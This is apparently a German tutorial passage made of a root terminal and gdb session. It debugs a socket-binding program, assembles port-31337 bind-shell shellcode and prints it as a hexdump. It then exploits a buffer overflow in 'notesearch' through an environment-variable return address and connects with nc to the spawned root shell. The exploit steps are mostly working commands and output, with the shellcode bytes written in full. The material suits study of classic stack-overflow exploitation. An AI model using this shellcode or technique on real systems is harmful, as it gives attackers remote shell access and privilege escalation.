root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o bind_port bind_port.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./bind_port
Reading symbols from /home/tomovic/Dokumente/hack/bind_port...done.
(gdb) list 18
13    sockfd = socket(PF_INET, SOCK_STREAM, 0);
14   
15    host_addr.sin_family = AF_INET;         // host byte order
16    host_addr.sin_port = htons(31337);      // short, network byte order
17    host_addr.sin_addr.s_addr = INADDR_ANY; // automatically fill with my IP
18    memset(&(host_addr.sin_zero), '\0', 8); // zero the rest of the struct
19 
20    bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
21 
22    listen(sockfd, 4);
(gdb) break 13
Haltepunkt 1 at 0x804851d: file bind_port.c, line 13.
(gdb) break 20
Haltepunkt 2 at 0x804857c: file bind_port.c, line 20.
(gdb) run
Starting program: /home/tomovic/Dokumente/hack/bind_port

Breakpoint 1, main () at bind_port.c:13
13    sockfd = socket(PF_INET, SOCK_STREAM, 0);
(gdb) x/5i $eip
=> 0x804851d <main+17>: movl   $0x0,0x8(%esp)
   0x8048525 <main+25>: movl   $0x1,0x4(%esp)
   0x804852d <main+33>: movl   $0x2,(%esp)
   0x8048534 <main+40>: call   0x8048400 <socket@plt>
   0x8048539 <main+45>: mov    %eax,0x38(%esp)
(gdb) cont
Continuing.
 
Breakpoint 2, main () at bind_port.c:20
20    bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0}, sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)
$2 = 16
(gdb) x/16xb &host_addr
0xbffff6d4: 0x02 0x00 0x7a 0x69 0x00 0x00 0x00 0x00
0xbffff6dc: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb) ^CQuit
(gdb) exit
Undefined command: "exit".  Try "help".
(gdb) quit
A debugging session is active.

 Inferior 1 [process 2999] will be killed.

Quit anyway? (y or n) y

Schön, dass man alles 1 zu 1 übernehmen kann; natürlich habt ihr auf eurem System eine andere Adresse.


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nasm bind_shell_beta.s
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# hexdump -C bind_shell_beta | grep --color=auto 00
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  89 c6 6a 66 58 43 52 66  68 7a 69 66 53 89 e1 6a  |..jfXCRfhzifS..j|
00000020  10 51 56 89 e1 cd 80 b0  66 43 43 53 56 89 e1 cd  |.QV.....fCCSV...|
00000030  80 b0 66 43 52 52 56 89  e1 cd 80 89 c3 6a 3f 58  |..fCRRV......j?X|
00000040  31 c9 cd 80 b0 3f 41 cd  80 b0 3f 41 cd 80 b0 0b  |1....?A...?A....|
00000050  52 68 2f 2f 73 68 68 2f  62 69 6e 89 e3 52 89 e2  |Rh//shh/bin..R..|
00000060  53 89 e1 cd 80                                    |S....|
00000065
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# export SHELLCODE=$(cat bind_shell_beta)
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./getenvaddr SHELLCODE ./notesearch
SHELLCODE will be at 0xbffff88a
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./notesearch $(perl -e 'print "\x8a\xf8\xff\xbf"x40')
[DEBUG] found a 31 byte note for user id 0
-------[ end of note data ]-------

Nun wechselt ihr in das andere Terminal:

root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# netstat -lp | grep 31337
tcp        0      0 *:31337                 *:*                     LISTEN      3324/notesearch
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# nc -vv 127.0.01 31337
Connection to 127.0.01 31337 port [tcp/*] succeeded!
ls
a
a.out
addr_struct.c
xtool_tinywebd_spoof.sh
xtool_tinywebd_steath.sh
^C
 

   

Jetzt C/C++ lernen

   